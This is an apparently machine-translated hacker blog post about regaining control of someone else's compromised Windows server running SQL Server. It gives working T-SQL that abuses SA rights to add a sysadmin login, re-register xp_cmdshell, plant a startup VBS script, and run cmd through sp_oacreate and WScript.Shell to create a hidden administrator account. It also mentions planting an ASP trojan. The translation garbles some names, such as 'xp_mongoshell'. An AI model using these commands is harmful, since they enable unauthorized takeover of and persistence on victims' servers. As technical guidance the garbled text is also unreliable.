Late at night, a friend suddenly sent a message saying that he was flying a 3389 zombie with a very good configuration. In the past, he started with web page injection, and then directly added the System user using xp_mongoshell. At night, when logging on to 3389, he suddenly found that the added user was gone, all installed backdoors are cleaned up, and xp_cmdshell cannot be executed.
My friend asked me to help you. I haven't tried the direct attack and defense of the Administrator, so I agreed!
Because the database is connected with the SA permission, the first thing I think of is to use the following command:
Exec master. DBO. sp_addlogin renwoxin
My goal is to add the database user "renwoxin" and then add it to the "SysAdmin" group:
Exec master. DBO. SP_ADDSRVROLEMEMBER renwoxin, SysAdmin
Then we can use the SQL query analyzer, which is our "tukubaodao. At first, I was lucky enough to pass the following code:
Sp_addextendedproc xp_cmdshell, @ dllname ='
Xplog70.dll '
Add the xp_cmdshell extension process. Unfortunately, the SQL output is as follows:
An object named xp_mongoshell already exists in the database.
To confirm whether xp_cmdshell is deleted, I submit the following statement:
Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = xp_mongoshell
1 is returned. It seems that the xp_cmdshell object has not been deleted. The problem should be that
Xplog70.dll This file may have been renamed or deleted.
I decided to use getwebshell to write ASP Trojans. The tool is easy to use and has been introduced in the past. After I use it, I will prompt that the write is successful. However, when I happily access this path, I will prompt "No webpage is found", which is depressing!
I was puzzled by this. I took out nbsi2. I used the tree list tool to list the files in the web path and found that the uploaded trojan was lying "peacefully" there, but why can't I access it? (I don't know the answer yet. Which of the top guys knows how to give some advice?) and the error message is "file not found "?!
I plan to give up, but such a good zombie is so flying, really unwilling! Go to Baidu and find an article Article In this paper, we propose a method to write the following command with the SQL query Analyzer:
Declare @ o int, @ F int, @ t int, @ RET int, @ A int
Exec sp_oacreate 'scripting. FileSystemObject ', @ o out
-- These two rows Code Is the Text object for creating SQL
Exec sp_oamethod @ o, 'createtextfile', @ F out, 'c: \ docume ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start \ A. vbs ', 1
-- Write A. vbs In the Startup menu. Of course, only Chinese characters are supported.
Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set wshshell = Createobject ("wscript. Shell ")'
-- The content of A. vbs is enclosed in single quotes. It must be written in one row, the same below.
Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'a = wshshell. Run ("cmd.exe/C net user user1 123/Add", 0 )'
Exec @ ret = sp_oamethod @ F, 'writeline ', null,' B = wshshell. Run ("cmd.exe/C net localgroup administrators user1/Add", 0 )'
-- A. vbs content ends
According to the author, A. vbs script is written into the Startup Program of the server after the query is executed. After the server is restarted, you can add a user with a user1 password of 123. But what day does it take to wait for the server to restart ?!
For this code, you can view the code above, down, left, and right. This script uses sp_oamethod to call the writeline method of the OLE object. It suddenly becomes a flash. Can I use sp_oamethod to execute the CMD command? Quickly find "SQL Server books online", which describes sp_oamethod as follows:
Sp_oamethod
Call the method of the OLE object.
Syntax
Sp_oamethod objecttoken,
???? Methodname
???? [, Returnvalue output]
???? [, [@ Parametername =] parameter [Output]
???? [... N]
Parameters
Objecttoken
Is the OLE object token previously created with sp_oacreate.
Methodname
Is the method name of the OLE object to be called.
Run cmd.exe using the runnerof wscript.shellobject. Can't I execute the CMD command? Construct the following statement:
Declare @ cmd int
Exec sp_oacreate 'wscript. shell', @ cmd output
Exec sp_oamethod @,'run', null,'cmd.exe/C net user renwoxin $ test/add', '0', 'true'
Tip: the detailed explanation of the preceding statement is:
Use sp_oacreate to create the token of the OLE object wscript. Shell.
Use sp_oamethod to call the run method of wscript. Shell to execute the CMD statement, add the user renwoxin $, and set the password to test. "0" and "true" are parameters of the run method: "0" is optional. Indicates the integer of the program window appearance, indicating that the CMD window is hidden when the statement is executed. If no value is added, a DOS window will pop up on the server, which is easy to expose. "True" is optional. Boolean value, indicating whether the script is waiting for the execution of the program before continuing to execute the next statement in the script. If it is set to true, the script is executed only after the program is executed. The run method returns any error code returned by the program. If it is set to false (default), the run method automatically returns 0 (not the error code) immediately after the program is started ).
after the preceding code is executed, the SQL query analyzer returns a value of 0, indicating that the execution is successful and renwoxin $ is upgraded to administrator:
declare @ cmd int
exec sp_oacreate 'wscript. shell ', @ cmd output
exec sp_oamethod @,'run', null,'cmd.exe/C net localgroup administrators renwoxin $/add', '0', 'true'
another 0 value is returned, what are you waiting for? Please check it out from 3389 and proceed smoothly! You will surely think that this run can execute almost all the CMD commands, but if you want to see the results, you need to construct your own tables to store them. You can use your imagination!
Find the binn folder under the SQL installation directory and find that xplog70.dll is deleted. Check again. The content of the ASP Trojan submitted with getwebshell is garbled! It cannot be executed. I still cannot figure out why, so I hope the heroes can write down the text. This article is about to end. I hope to see my article as soon as possible.